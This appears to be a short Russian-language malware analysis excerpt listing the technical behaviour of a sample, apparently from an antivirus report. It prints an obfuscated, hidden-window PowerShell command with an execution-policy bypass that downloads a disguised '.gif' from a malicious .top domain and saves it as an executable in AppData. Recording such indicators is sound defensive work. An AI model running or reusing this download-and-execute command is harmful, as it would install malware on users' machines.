Техническая информация
- http://www.basopoew.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWerSHell.exe -exeCutiOnpolICY byPASs -noProfILe -WindoWstYLE HiDDEn (New-oBJECT SySTEm.NeT.WEBCLIEnT).DoWNloADFiLe('http://www.basopoew.top/read.php?f=1.gif','%ApPdatA%...
- DNS ASK ba###oew.top
- '<SYSTEM32>\cmd.exe' /c "PoWerSHell.exe -exeCutiOnpolICY byPASs -noProfILe -WindoWstYLE HiDDEn (New-oBJECT SySTEm.NeT.WEBCLIEnT).DoWNloADFiLe('http://www.basopoew.top/read.php?f=1.gif','%ApPdatA%...' (со скрытым окном)